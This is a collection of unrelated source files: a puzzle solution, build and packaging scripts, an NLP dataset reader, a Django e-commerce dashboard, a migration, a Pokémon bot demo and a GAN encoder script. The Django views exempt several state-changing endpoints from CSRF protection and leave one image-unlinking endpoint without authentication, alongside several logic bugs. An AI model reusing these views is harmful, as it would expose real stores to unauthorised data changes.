c[n[bit]].append(n)
if len(oxy) > 1:
oxy = o["1"] if len(o["1"]) >= len(o["0"]) else o["0"]
if len(co2) > 1:
co2 = c["0"] if len(c["1"]) >= len(c["0"]) else c["1"]
return int(oxy[0], 2) * int(co2[0], 2)
if __name__ == "__main__":
print("Part 1:", part_1(__file__))
print("Part 2:", part_2(__file__))
|
# -*- coding: utf-8 -*-
from setuptools import setup, Extension
packages = [
"swig_ex2",
]
ext_modules = [
Extension(
name="_swig_ex2",
sources=["ex2.c", "ex2_wrap.c"],
),
]
setup(
name="swig_ex2",
version="1.0.0",
description="SWIG Example2",
ext_modules=ext_modules,
packages=packages,
package_dir={"swig_ex2": ""},
)
|
import logging
import json
from typing import Dict, Any, Optional, List
from allennlp.common.file_utils import cached_path
from allennlp.common.checks import ConfigurationError
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from allennlp.data.instance import Instance
from allennlp.data.tokenizers import Token
from allennlp.data.fields import TextField, MultiLabelField, MetadataField, Field
from overrides import overrides
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
@DatasetReader.register("emotion")
class EmotionDatasetReader(DatasetReader):
'''
Dataset reader designed to read a list of JSON like objects of the
following type:
{"ID": "2017-En-21441",
"text": "\u201cWorry is a down payment on a problem you may never have'.
\u00a0Joyce Meyer. #motivation #leadership #worry",
"tokens": ["\u201c", "Worry", "is", "a", "down", "payment", "on", "a",
"problem", "you", "may", "never", "have", "'", ".", "Joyce",
"Meyer", ".", "#", "motivation", "#", "leadership", "#",
"worry"],
"labels": ["anticipation", "optimism", "trust"]}
:returns: A ``Dataset`` of ``Instances`` for Target Extraction.
'''
def __init__(self, lazy: bool = False,
token_indexers: Dict[str, TokenIndexer] = None) -> None:
super().__init__(lazy)
self._token_indexers = token_indexers or \
{"tokens": SingleIdTokenIndexer()}
@overrides
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
with open(file_path, 'r') as emotion_file:
logger.info("Reading Emotion instances from jsonl dataset at: %s",
file_path)
for line in emotion_file:
example = json.loads(line)
example_instance: Dict[str, Any] = {}
multiple_emotion_labels = example["labels"]
tokens_ = example["tokens"]
# TextField requires ``Token`` objects
tokens = [Token(token) for token in tokens_]
example_instance['labels'] = multiple_emotion_labels
example_instance['tokens'] = tokens
example_instance['text'] = example["text"]
example_instance['ID'] = example['ID']
yield self.text_to_instance(**example_instance)
def text_to_instance(self, tokens: List[Token],
text: str, ID: Optional[str] = None,
labels: Optional[List[str]] = None) -> Instance:
'''
The tokens are expected to be pre-tokenised.
:param tokens: The text that has been tokenised
:param text: The text from the sample
:param ID: The ID of the sample
:param labels: A list of labels (can be an empty list which is
associated implictly to the neutral class)
:returns: An Instance object with all of the above enocded for a
PyTorch model.
'''
token_sequence = TextField(tokens, self._token_indexers)
instance_fields: Dict[str, Field] = {'tokens': token_sequence}
meta_fields = {}
meta_fields["words"] = [x.text for x in tokens]
meta_fields["text"] = text
if ID is not None:
meta_fields["ID"] = ID
instance_fields["metadata"] = MetadataField(meta_fields)
if labels is not None:
instance_fields['labels'] = MultiLabelField(labels,
label_namespace="labels")
return Instance(instance_fields)
|
from conans import ConanFile
import os
from conans.tools import download, unzip, check_sha256
from conans import CMake
class ArbitraryName(ConanFile):
name = "sso-23"
version = "2015.1.29"
branch = "master"
generators = "cmake"
license = "Boost"
url="http://github.com/TyRoXx/conan-sso-23"
ZIP_FOLDER_NAME = "SSO-23-533e88bb9f6e7f6023beeede2b00b0b0f3f6b4ae"
def source(self):
zip_name = "sso-23.zip"
download("https://github.com/elliotgoodrich/SSO-23/archive/533e88bb9f6e7f6023beeede2b00b0b0f3f6b4ae.zip", zip_name)
check_sha256(zip_name, "701b1d2396bf17b7d8473bab2f955a351603cd407db3626c2e5105ef209b6724")
unzip(zip_name)
os.unlink(zip_name)
def package(self):
self.copy("*.hpp", "include", "%s/include" % self.ZIP_FOLDER_NAME, keep_path=True)
|
_SCOPES = ["https://www.googleapis.com/auth/spreadsheets.readonly"]
# sample doc at: https://docs.google.com/spreadsheets/d/1X0wsfpb5-sm2PE4_dJDliBOrXIOzvVrYrA1JYeyS06c/edit?usp=sharing
_SPREADSHEET_ID = "1X0wsfpb5-sm2PE4_dJDliBOrXIOzvVrYrA1JYeyS06c"
_SHEET_NAME = "Sheet1"
_TEMPLATE_NAME = "template.pdf"
|
import csv
import io
import json
import random
import re
from django import http
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core import exceptions
from django.core.mail import send_mail, send_mass_mail
from django.core.paginator import Paginator
from django.db import transaction as atomic_transactions
from django.db.models.expressions import F, Q
from django.shortcuts import get_object_or_404, redirect, render, reverse
from django.utils.decorators import method_decorator
from django.utils.html import mark_safe
from django.utils.translation import gettext_lazy as _
from django.views import generic
from django.views.decorators import http as views_decorators
from django.views.decorators.csrf import csrf_exempt
from dashboard import forms
from dashboard import models as dashboard_models
from shop import choices, models, serializers, utilities
MYUSER = get_user_model()
class IndexView(LoginRequiredMixin, generic.View):
def get(self, request, *args, **kwargs):
context = {
'carts_without_orders': models.Cart.statistics.carts_without_orders(),
'orders_count': models.CustomerOrder.statistics.total_count(),
'latest_orders': models.CustomerOrder.statistics.latest_orders(),
'revenue': models.CustomerOrder.statistics.revenue(),
'awaiting': models.CustomerOrder.statistics.awaiting_revenue(),
'refunded': models.CustomerOrder.statistics.total_refunded_orders()
}
return render(request, 'pages/home.html', context)
class ProductsView(LoginRequiredMixin, generic.ListView):
model = models.Product
queryset = models.Product.objects.all()
template_name = 'pages/lists/products.html'
context_object_name = 'products'
paginate_by = 10
def get(self, request, *args, **kwargs):
get_request = super().get(request, *args, **kwargs)
# This section resets the next_for_update in the
# session to prevent persistence when trying to
# return to the product page
previous_searched_terms = self.request.session.get('next_for_update')
if previous_searched_terms:
self.request.session.pop('next_for_update')
return get_request
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
paginator = Paginator(self.queryset, self.paginate_by)
page = self.request.GET.get('page')
products = paginator.get_page(page)
serialized_products = serializers.SimpleProductSerializer(
instance=products.object_list, many=True)
context['on_current_page'] = serialized_products.data
context['number_of_items'] = self.queryset.count()
return context
class SearchView(LoginRequiredMixin, generic.ListView):
model = models.Product
template_name = 'pages/lists/search/products.html'
context_object_name = 'products'
paginate_by = 10
def get_context_data(self, **kwargs):
context = super().get_context_data()
context['search'] = searched_term = self.request.GET.get('s')
self.request.session.update({'next_for_update': searched_term})
return context
def get_queryset(self):
searched_terms = self.request.GET.get('s')
return self.model.product_manager.advanced_search(searched_terms)
class CreateProductView(LoginRequiredMixin, generic.CreateView):
model = models.Product
queryset = models.Product.objects.all()
form_class = forms.CreateProductForm
template_name = 'pages/edit/create/product.html'
context_object_name = 'product'
def get_success_url(self):
return reverse('dashboard:products:home')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['post_to_view'] = reverse('dashboard:products:create')
# This triggers the apparation or
# not of certain features on the update
# and creation page. For instance, unlinking
# an image on the creation is not necessary
context['vue_edit_mode'] = 'create'
return context
class UpdateProductView(LoginRequiredMixin, generic.UpdateView):
model = models.Product
template_name = 'pages/edit/update/product.html'
form_class = forms.UpdateProductForm
context_object_name = 'product'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
product = super().get_object()
context['post_to_view'] = reverse('dashboard:products:update', args=[product.id])
# If we clicked update from the search page,
# this method allows to return that same
# search page as opposed to all the products
context['return_to_search'] = self.request.session.get('next_for_update') or None
# This section allows the user
# to navigate from product to
# product in the updae page
# <- and -> arrows
queryset = super().get_queryset()
queryset_list = list(queryset.values_list('id', flat=True))
queryset_list_length = len(queryset_list)
current_product_index = queryset_list.index(product.id)
next_product_index = current_product_index + 1
if next_product_index == queryset_list_length:
next_product_index = 0
context['disable_next'] = True
context['previous_product'] = reverse('dashboard:products:update', args=[queryset_list[current_product_index - 1]])
context['next_product'] = reverse('dashboard:products:update', args=[queryset_list[next_product_index]])
serialized_product = serializers.ProductSerializer(instance=product)
context['vue_product'] = serialized_product.data
images = models.Image.objects.all()
context['images'] = images = images.exclude(id__in=product.images.values_list('id'))
serialized_other_images = serializers.ImageSerializer(images, many=True)
context['vue_other_images'] = serialized_other_images.data
# This triggers the apparation or
# not of certain features on the update
# and creation page. For instance, unlinking
# an image on the creation is not necessary
context['vue_edit_mode'] = 'update'
context['vue_unlink_image_url'] = reverse('dashboard:products:unlink', args=[product.id])
return context
def get_success_url(self):
product = super().get_object()
return reverse('dashboard:products:update', args=[product.id])
class UsersView(LoginRequiredMixin, generic.ListView):
model = MYUSER
queryset = MYUSER.objects.all()
template_name = 'pages/lists/users.html'
context_object_name = 'users'
paginate_by = 10
class UserView(LoginRequiredMixin, generic.DetailView):
model = MYUSER
queryset = MYUSER.objects.all()
template_name = 'pages/edit/update/profile.html'
context_object_name = 'user'
def post(self, request, **kwargs):
user = super().get_object()
try:
user.email_user('subject', 'message', from_email='contact.mywebsite@gmail.com')
except:
messages.warning(request, "L'email n'a pas pu être envoyé", extra_tags='alert-warning')
else:
messages.success(request, f"Email envoyé à {user.email}", extra_tags='alert-success')
return redirect(reverse('dashboard_user', args=[user.id]))
class CustomerOrdersView(LoginRequiredMixin, generic.ListView):
"""Show all the orders made by customers
"""
model = models.CustomerOrder
queryset = models.CustomerOrder.objects.all()
template_name = 'pages/lists/orders.html'
context_object_name = 'orders'
paginate_by = 10
class CustomerOrderView(LoginRequiredMixin, generic.UpdateView):
"""Orders for one single product
"""
model = models.CustomerOrder
form_class = forms.CustomerOrderForm
template_name = 'pages/edit/update/order.html'
context_object_name = 'order'
def get_success_url(self):
order = super().get_object()
return reverse('dashboard:customer_order', args=[order.id])
class CartsView(LoginRequiredMixin, generic.ListView):
model = models.Cart
queryset = models.Cart.objects.all()
template_name = 'pages/lists/carts.html'
context_object_name = 'carts'
paginate_by = 5
class ImagesView(LoginRequiredMixin, generic.ListView):
model = models.Image
queryset = models.Image.objects.all()
template_name = 'pages/lists/images.html'
context_object_name = 'images'
paginate_by = 8
@atomic_transactions.atomic
def post(self, request, **kwargs):
authorized_methods = [
'from-url', 'from-local'
]
method = request.POST.get('method')
if not method:
message = {
'level': messages.ERROR,
'message': _("Une erreur s'est produite - IMG-UP"),
'extra_tags': 'alert-error'
}
else:
if method in authorized_methods:
name = request.POST.get('new-image-name')
variant = request.POST.get('new-image-variant')
if not name:
message = {
'level': messages.ERROR,
'message': _("Vous devez attribuer un nom à votre image - IMG-UP"),
'extra_tags': 'alert-error'
}
else:
if method == 'from-url':
url = request.POST.get('new-image-link')
models.Image.objects.create(**{'name': name, 'url': url, 'variant': variant})
message = {
'level': messages.SUCCESS,
'message': _("Vos images ont été téléchargé"),
'extra_tags': 'alert-success'
}
elif method == 'from-local':
pass
messages.add_message(request, **message)
return redirect(reverse('dashboard:images:home'))
def get_context_data(self, **kwargs):
queryset = super().get_queryset()
context = super().get_context_data(**kwargs)
paginator = Paginator(queryset, self.paginate_by)
page = self.request.GET.get('page')
images = paginator.get_page(page)
serialized_images = serializers.ImageSerializer(images.object_list, many=True)
context['vue_images'] = serialized_images.data
return context
@method_decorator(atomic_transactions.atomic, name='post')
class ImageView(LoginRequiredMixin, generic.UpdateView):
model = models.Image
queryset = models.Image.objects.all()
form_class = forms.ImageForm
template_name = 'pages/edit/update/image.html'
context_object_name = 'image'
def get_success_url(self):
image = super().get_object()
return reverse('dashboard:images:update', args=[image.id])
class SettingsView(LoginRequiredMixin, generic.TemplateView):
template_name = 'pages/edit/update/settings/index.html'
# def get_context_data(self, **kwargs):
# context = super().get_context_data(**kwargs)
# user = self.request.user
# try:
# user_store = dashboard_models.DashboardSetting.objects.get(user=self.request.user)
# except:
# user_has_store = False
# else:
# user_has_store = True
# context['store'] = user_store
# context['user_has_store'] = user_has_store
# return context
class DashboardSettingsMixin:
def custom_post(self, request, redirect_url, form, **kwargs):
form = form(request.POST)
if form.errors:
messages.error(request, f'Le formulaire possède des erreurs: {[error for error in form.errors.keys()]}', extra_tags='alert-danger')
if form.is_valid():
item = dashboard_models.DashboardSetting.objects.filter(id=request.user.id)
item.update(**form.cleaned_data)
return redirect(reverse(redirect_url))
class GeneralSettingsView(LoginRequiredMixin, generic.View):
def get(self, request, *args, **kwargs):
user = request.user
setting = dashboard_models.DashboardSetting.objects.get(myuser=user)
context = {
'store': dashboard_models.DashboardSetting.objects.get(myuser=user),
'form': forms.DashboardSettingsForm(
initial={
'name': setting.name,
'legal_name': setting.legal_name,
'telephone': setting.telephone,
'contact_email': setting.contact_email,
'customer_care_email': setting.customer_care_email,
'automatic_archives': setting.automatic_archive
}
)
}
return render(request, 'pages/edit/update/settings/general.html', context)
def post(self, request, **kwargs):
form = forms.DashboardSettingsForm(request.POST)
if form.errors:
messages.error(request, f'Le formulaire possède des erreurs: {[error for error in form.errors.keys()]}', extra_tags='alert-danger')
if form.is_valid():
item = dashboard_models.DashboardSetting.objects.filter(id=request.user.id)
item.update(**form.cleaned_data)
return redirect(reverse('dashboard:settings:general'))
class StoreSettingsView(LoginRequiredMixin, generic.UpdateView):
model = dashboard_models.DashboardSetting
form_class = forms.DashboardSettingsForm
success_url = '/dashboard/settings'
context_object_name = 'store'
template_name = 'pages/edit/update/settings/shop.html'
class AnalyticsSettingsView(LoginRequiredMixin, DashboardSettingsMixin, generic.View):
def get(self, request, *args, **kwargs):
user = request.user
setting = dashboard_models.DashboardSetting.objects.get(myuser=user)
context = {
'store': dashboard_models.DashboardSetting.objects.get(myuser=user),
'form': forms.AnalyticsSettingsForm(
initial={
'google_analytics': setting.google_analytics,
'google_tag_manager': setting.google_tag_manager,
'google_optimize': setting.google_optimize,
'google_ads': setting.google_ads,
'facebook_pixels': setting.facebook_pixels,
'mailchimp': setting.mailchimp
}
)
}
return render(request, 'pages/edit/update/settings/analytics.html', context)
def post(self, request, **kwargs):
return self.custom_post(request, 'dashboard:settings:analytics', forms.AnalyticsSettingsForm, **kwargs)
class CouponsView(LoginRequiredMixin, generic.ListView):
model = models.Discount
queryset = models.Discount.objects.all()
template_name = 'pages/lists/coupons.html'
context_object_name = 'coupons'
class CreateCouponsView(LoginRequiredMixin, generic.CreateView):
model = models.Discount
form_class = forms.DiscountForm
queryset = models.Discount.objects.all()
template_name = 'pages/edit/create/coupon.html'
context_object_name = 'coupon'
class UpdateCouponsView(LoginRequiredMixin, generic.UpdateView):
model = models.Discount
form_class = forms.DiscountForm
queryset = models.Discount.objects.all()
template_name = 'pages/edit/update/coupon.html'
context_object_name = 'coupon'
def get_success_url(self):
coupon = super().get_object()
return reverse('dashboard:coupons:update', args=[coupon.id])
class CollectionsView(LoginRequiredMixin, generic.ListView):
model = models.ProductCollection
queryset = models.ProductCollection.objects.all()
template_name = 'pages/lists/collections.html'
context_object_name = 'collections'
paginate_by = 10
class CreateCollectionView(LoginRequiredMixin, generic.CreateView):
model = models.ProductCollection
form_class = forms.CollectionForm
template_name = 'pages/edit/create/collection.html'
context_object_name = 'collection'
success_url = '/dashboard/collections'
class UpdateCollectionView(LoginRequiredMixin, generic.UpdateView):
model = models.ProductCollection
form_class = forms.CollectionForm
template_name = 'pages/edit/update/collection.html'
context_object_name = 'collection'
def get_success_url(self):
product = super().get_object()
return reverse('dashboard:collections:update', args=[product.id])
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
second_conditions = [
{'id': i, 'name': condition[0]}
for i, condition in enumerate(choices.SecondConditionsChoices.choices)
]
context['vue_second_conditions'] = second_conditions
return context
class CreateCustomerView(LoginRequiredMixin, generic.CreateView):
model = MYUSER
form_class = forms.CustomerForm
template_name = 'pages/edit/create/customer.html'
context_object_name = 'customer'
class PurchaseOrderView(LoginRequiredMixin, generic.TemplateView):
template_name = 'pages/edit/create/purchase_order.html'
@csrf_exempt
@login_required
@atomic_transactions.atomic
@views_decorators.require_GET
def activate_coupon(request, **kwargs):
state = False
coupon = models.Discount.objects.get(id=kwargs['pk'])
if coupon:
if coupon.active:
coupon.active = False
else:
coupon.active = True
coupon.save()
state = True
message = {
'level': messages.SUCCESS,
'message': "Le coupon a été activé",
'extra_tags': 'alert-success'
}
else:
message = {
'level': messages.ERROR,
'message': "Une erreur s'est produite - COUP-AC",
'extra_tags': 'alert-danger'
}
messages.add_message(request, **message)
return http.JsonResponse(data={'state': state})
@csrf_exempt
@login_required
@views_decorators.require_POST
def upload_csv(request):
file = request.FILES
try:
data = file['newcsvfile']
except:
messages.error(request, "Une erreur s'est produite", extra_tags='alert-warning')
return http.JsonResponse({'state': False})
if not data.name.endswith('.csv'):
messages.error(request, "Le fichier doit être de type .csv", extra_tags='alert-warning')
return http.JsonResponse({'state': False})
messages.error(request, "Les produits ont été créés", extra_tags='alert-success')
return http.JsonResponse(data={'state': True})
@csrf_exempt
@login_required
@views_decorators.require_http_methods(['GET', 'POST'])
def download_csv(request):
authorized_exports = ['current', 'all', 'collection']
method = request.GET.get('method') or request.POST.get('method')
if method not in authorized_exports \
or not method:
messages.error(request, "Action non reconnue - EXP-C1", extra_tags='alert-danger')
return http.JsonResponse(data={'state': False, 'code': 'EXP-C1'}, code=200)
authorized_exports_for = ['general', 'facebook']
export_for = request.GET.get('export_for')
if export_for not in authorized_exports_for:
messages.error(request, "Action non reconnue - EXP-C2", extra_tags='alert-danger')
return http.JsonResponse(data={'state': False, 'code': 'EXP-C2'}, code=200)
facebook_headers = ['id', 'title', 'description', 'condition', 'availability',
'link', 'brand', 'price', 'image_link', 'google_product_category',
'gender', 'is_final_sale', 'return_policy_days', 'inventory']
general_headers = ['id', 'name', 'description', 'price_ht', 'active']
if request.GET:
if method == 'all':
products = models.Product.product_manager.filter(active=True)
elif method == 'collection':
name = request.GET.get('using')
if not name:
messages.error(request, "Collection non reconnue - EXP-C3", extra_tags='alert-warning')
return http.JsonResponse(data={'state': False, 'code': 'EXP-C3'}, code=200)
else:
try:
products = models.ProductCollection.collection_manager.active_products(name)
except:
messages.error(request, "Collection non reconnue - EXP-C3", extra_tags='alert-warning')
return http.JsonResponse(data={'state': False, 'code': 'EXP-C3'}, code=200)
if request.POST:
if method == "current":
product_ids = request.POST.get('products')
try:
product_ids = product_ids.split(',')
except:
raise http.Http404()
else:
product_ids = [int(pk) for pk in product_ids]
if len(product_ids) == 0:
raise http.Http404()
products = models.Product.objects.filter(pk__in=product_ids)
if products:
if export_for == 'general':
headers = general_headers
if export_for == 'facebook':
headers = facebook_headers
rows = []
response = http.HttpResponse(content_type='text/csv')
csv_writer = csv.writer(response)
csv_writer.writerow(headers)
for product in products:
if export_for == 'general':
rows.append(
[
product.id,
product.name,
product.description,
product.price_ht,
product.active
]
)
if export_for == 'facebook':
url = f'https://namywebsitewoka.fr{product.get_absolute_url()}'
if product.gender == 'femme':
gender = 'female'
else:
gender = 'male'
rows.append(
[
product.id,
product.name,
product.description,
'new',
'in stock',
url,
'Nawoka',
product.get_price(),
product.get_main_image_url,
product.google_category,
gender,
False,
14,
50
]
)
csv_writer.writerows(rows)
response['Content-Disposition'] = 'inline; filename=products.csv'
return response
messages.error(request, "Les données n'ont pas pu être exportéù - EXP-CG", extra_tags='alert-warning')
return http.JsonResponse(data={'state': 'Failed'}, code=200)
@login_required
@atomic_transactions.atomic
@views_decorators.require_POST
def table_actions(request, **kwargs):
method = request.POST.get('method')
if not method or method == 'not-selected':
messages.error(request, "Actions non reconnue - TAB-AC", extra_tags='alert-danger')
return redirect(request.GET.get('next') or 'dashboard:home')
authorized_methods = [
'activate', 'deactivate', 'duplicate', 'delete', 'archive'
]
if method not in authorized_methods:
messages.error(request, "Actions non reconnue - TAB-AC", extra_tags='alert-danger')
return redirect(request.GET.get('next') or 'dashboard:home')
keys = request.POST.getlist('key')
if not keys:
messages.error(request, "Aucun éléments n'a été sélectionnés", extra_tags='alert-warning')
return redirect(request.GET.get('next') or 'dashboard:home')
products = models.Product.objects.filter(id__in=keys)
number_of_products = products.count()
if not products.exists():
messages.warning(request, "Aucun élément n'a été trouvé", extra_tags='alert-warning')
return redirect(request.GET.get('next') or 'dashboard:home')
if number_of_products > 1:
message_text = '{prefix} éléments ont été {suffix}s'
else:
message_text = '{prefix} élément a été {suffix}'
message = {
'level': messages.SUCCESS,
'extra_tags': 'alert-success'
}
if method == 'activate':
non_active_products = products.filter(active=False)
non_active_products.update(active=True)
message['message'] = message_text.format(prefix=number_of_products, suffix='activé')
if method == 'deactivate':
active_products = products.filter(active=True)
active_products.update(active=False)
message['message'] = message_text.format(prefix=number_of_products, suffix='désactivé')
if method == 'duplicate':
new_items = [
models.Product(
name=f'Copie de {product.name}',
active=False
) for product in products
]
models.Product.objects.bulk_create(new_items)
message['message'] = message_text.format(prefix=number_of_products, suffix='dupliqué')
if method == 'delete':
products.delete()
message['message'] = message_text.format(prefix=number_of_products, suffix='supprimé')
if method == 'archive':
message['message'] = message_text.format(prefix=number_of_products, suffix='archivé')
messages.add_message(request, **message)
return redirect(request.GET.get('next') or 'dashboard:home')
@login_required
@atomic_transactions.atomic
@views_decorators.require_GET
def delete_item_via_table(request, **kwargs):
"""
Delete an element from the database via a table
"""
method = kwargs['method']
if method == 'products':
item = get_object_or_404(models.Product, id=kwargs['pk'])
if method == 'carts':
item = get_object_or_404(models.Cart, id=kwargs['pk'])
# Check if the cart has orders and if so,
# mark them as terminated or completed
item.customerorder_set.all().update(completed=True)
item.delete()
url = f'dashboard:{method}:home'
if method == 'carts':
url = f'dashboard:carts'
page = request.GET.get('page')
url = reverse(url)
if page:
url = f'{url}?page={page}'
messages.success(request, f"L'élément a été supprimé", extra_tags='alert-success')
return redirect(url)
@login_required
@atomic_transactions.atomic
@views_decorators.require_GET
def delete_product(request, **kwargs):
"""
Delete a product from the update page
"""
item = get_object_or_404(models.Product, id=kwargs['pk'])
item.delete()
messages.success(
request, f"{item.name} a été supprimé", extra_tags='alert-success')
return redirect('dashboard:products:home' or request.GET.get('next'))
@login_required
@views_decorators.require_POST
def duplicate_view(request, **kwargs):
state = False
try:
product = models.Product.objects.get(id=kwargs['pk'])
except:
messages.error(
request, "Le produit n'a pas pu être dupliqué - DUP-NE", extra_tags='alert-danger')
return http.JsonResponse(data={'state': state}, code=400)
base = {
'name': f'Copie de {product.name}',
'gender': product.gender,
'description': product.description,
'price_ht': product.price_ht,
'quantity': product.quantity,
'slug': f'copie-de-{product.slug}',
'collection': product.collection,
'discount_pct': product.discount_pct,
'discounted': product.discounted,
'private': product.private
}
try:
with atomic_transactions.atomic():
new_product = models.Product.objects.create(**base)
except:
messages.error(
request, "Le produit n'a pas pu être dupliqué - DUP-NP", extra_tags='alert-warning')
return http.JsonResponse(data={'state': state}, code=400)
else:
# Also associate all images with the preceeding
# product with the new one
product_images = product.images.all()
if product_images.exists():
new_product.images.set(product_images)
messages.success(
request, f"{new_product.name} a été créer", extra_tags="alert-success")
return http.JsonResponse(data={'redirect_url': reverse('dashboard:products:update', args=[new_product.id])})
@login_required
@views_decorators.require_POST
def create_images(request, **kwargs):
method = request.POST.get('method')
if method == 'new':
images = []
data = request.POST.dict()
for _, value in data.items():
if value.endswith('.jpeg') or \
value.endswith('.jpg'):
images.append(value)
images_objects = []
for index, url in enumerate(images):
if index == 0:
images_objects.append(models.Image(url=url, main_image=True))
else:
images_objects.append(models.Image(url=url))
new_images = models.Image.objects.bulk_create(images_objects)
request.session['images_to_associate'] = [
image.id for image in new_images]
return http.JsonResponse(data={'status': 'Uploaded'})
if method == 'update':
product_id = request.POST.get('product')
product = get_object_or_404(models.Product, id=product_id)
return http.JsonResponse(data={'status': 'Uploaded'})
@login_required
@csrf_exempt
@views_decorators.require_POST
def associate_images(request, **kwargs):
product = models.Product.objects.get(id=kwargs['pk'])
images = request.POST.get('image')
if images:
error = False
for key in images:
if not isinstance(key, int):
error = True
if error:
messages.error(
request, "Les images n'ont pas pu être associé - ASSO-ID", extra_tags='alert-warning')
return http.JsonResponse(data={'state': False, })
db_images = models.Image.objects.filter(id__in=images)
product.images.set(db_images)
messages.error(
request, "Les images n'ont pas pu être associé - ASSO-ID", extra_tags='alert-warning')
return http.JsonResponse(data={'state': False, })
@csrf_exempt
@atomic_transactions.atomic
@views_decorators.require_POST
def unlink_image_on_product_page(request, **kwargs):
state = False
product_id = kwargs['pk']
image = request.POST.get('image')
editmode = request.POST.get('method')
editmodes = ['create', 'update']
if not editmode or editmode not in editmodes:
return http.JsonResponse(data={'state': False})
if not image:
messages.error(request, _("Une erreur s'est produite - IMG-UN"))
return http.JsonResponse(data={'state': state})
product = models.Product.objects.get(id=product_id)
image = models.Image.objects.get(id=image)
product.images.remove(image)
return http.JsonResponse(data={'state': state})
|
from .reply_server import Server
|
# Generated by Django 2.0.7 on 2018-07-30 06:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('question', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='attachment',
name='detail_id',
),
migrations.RemoveField(
model_name='attachment',
name='detail_type',
),
migrations.AddField(
model_name='question',
name='attachment_id',
field=models.IntegerField(blank=True, db_index=True, null=True, verbose_name='附件id'),
),
migrations.AlterField(
model_name='answer',
name='file',
field=models.FileField(blank=True, null=True, upload_to='uploads/answer/%Y/%m/%d', verbose_name='文件结果'),
),
migrations.AlterField(
model_name='attachment',
name='file_url',
field=models.FileField(blank=True, null=True, upload_to='uploads/question/%Y/%m/%d', verbose_name='文件结果'),
),
]
|
import asyncio # for concurrency
from poke_env.player.random_player import RandomPlayer
from poke_env.player.utils import cross_evaluate
from tabulate import tabulate
async def main():
"""Create a 3 random pokemon trainer bot to to fight against each other with random actions"""
# We create three random players - we do not train this player
players = [RandomPlayer(max_concurrent_battles=10) for _ in range(3)]
# Every player will play 20 games against every other player
cross_evaluation = await cross_evaluate(players, n_challenges=20)
# Defines a header for displaying results
table = [["-"] + [p.username for p in players]]
# Adds one line per player with corresponding results - loop just for create a table
for p_1, results in cross_evaluation.items():
table.append([p_1] + [cross_evaluation[p_1][p_2] for p_2 in results])
# Displays results in a nicely formatted table.
print(tabulate(table))
if __name__ == "__main__":
asyncio.get_event_loop().run_until_complete(main())
|
# infer Encoder via pre-trained models, before use this code, set args from line 171 carefully (parameters for model type, path, image size and so on).
import os
import math
import torch
import torch.nn as nn
import torchvision
import model.E.E as BE
#import model.E.E_blur as BE # if use case 2 change above line
import model.E.E_PG as BE_PG
import model.E.E_BIG as BE_BIG
from model.utils.custom_adam import LREQAdam
import lpips
from metric.grad_cam import GradCAM, GradCamPlusPlus, GuidedBackPropagation, mask2cam
import tensorboardX
import numpy as np
import argparse
from model.stylegan1.net import Generator, Mapping #StyleGANv1
import model.stylegan2_generator as model_v2 #StyleGANv2
import model.pggan.pggan_generator as model_pggan #PGGAN
from model.biggan_generator import BigGAN #BigGAN
from model.utils.biggan_config import BigGANConfig
from training_utils import *
def train(tensor_writer = None, args = None):
type = args.mtype
model_path = args.checkpoint_dir_GAN
if type == 1: # StyleGAN1
Gs = Generator(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3)
Gs.load_state_dict(torch.load(model_path+'Gs_dict.pth'))
Gm = Mapping(num_layers=int(math.log(args.img_size,2)-1)*2, mapping_layers=8, latent_size=512, dlatent_size=512, mapping_fmaps=512) #num_layers: 14->256 / 16->512 / 18->1024
Gm.load_state_dict(torch.load(model_path+'/Gm_dict.pth'))
Gm.buffer1 = torch.load(model_path+'/center_tensor.pt')
const_ = Gs.const
const1 = const_.repeat(args.batch_size,1,1,1).cuda()
layer_num = int(math.log(args.img_size,2)-1)*2 # 14->256 / 16 -> 512 / 18->1024
layer_idx = torch.arange(layer_num)[np.newaxis, :, np.newaxis] # shape:[1,18,1], layer_idx = [0,1,2,3,4,5,6。。。,17]
ones = torch.ones(layer_idx.shape, dtype=torch.float32) # shape:[1,18,1], ones = [1,1,1,1,1,1,1,1]
coefs = torch.where(layer_idx < layer_num//2, 0.7 * ones, ones) # 18个变量前8个裁剪比例truncation_psi [0.7,0.7,...,1,1,1]
Gs.cuda()
Gm.eval()
E = BE.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3)
elif type == 2: # StyleGAN2
generator = model_v2.StyleGAN2Generator(resolution=args.img_size).to(device)
checkpoint = torch.load(model_path) #map_location='cpu'
if 'generator_smooth' in checkpoint: #default
generator.load_state_dict(checkpoint['generator_smooth'])
else:
generator.load_state_dict(checkpoint['generator'])
synthesis_kwargs = dict(trunc_psi=0.7,trunc_layers=8,randomize_noise=False)
#Gs = generator.synthesis
#Gm = generator.mapping
const_r = torch.randn(args.batch_size)
const1 = generator.synthesis.early_layer(const_r) #[n,512,4,4]
#E = BE.BE(startf=64, maxf=512, layer_count=7, latent_size=512, channels=3) # 256
E = BE.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3) # layer_count: 7->256 8->512 9->1024
elif type == 3: # PGGAN
generator = model_pggan.PGGANGenerator(resolution=args.img_size).to(device)
checkpoint = torch.load(model_path) #map_location='cpu'
if 'generator_smooth' in checkpoint: #默认是这个
generator.load_state_dict(checkpoint['generator_smooth'])
else:
generator.load_state_dict(checkpoint['generator'])
const1 = torch.tensor(0)
E = BE_PG.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3, pggan=True)
elif type == 4:
config = BigGANConfig.from_json_file(args.config_dir)
generator = BigGAN(config).to(device)
generator.load_state_dict(torch.load(model_path))
E = BE_BIG.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3, biggan=True)
else:
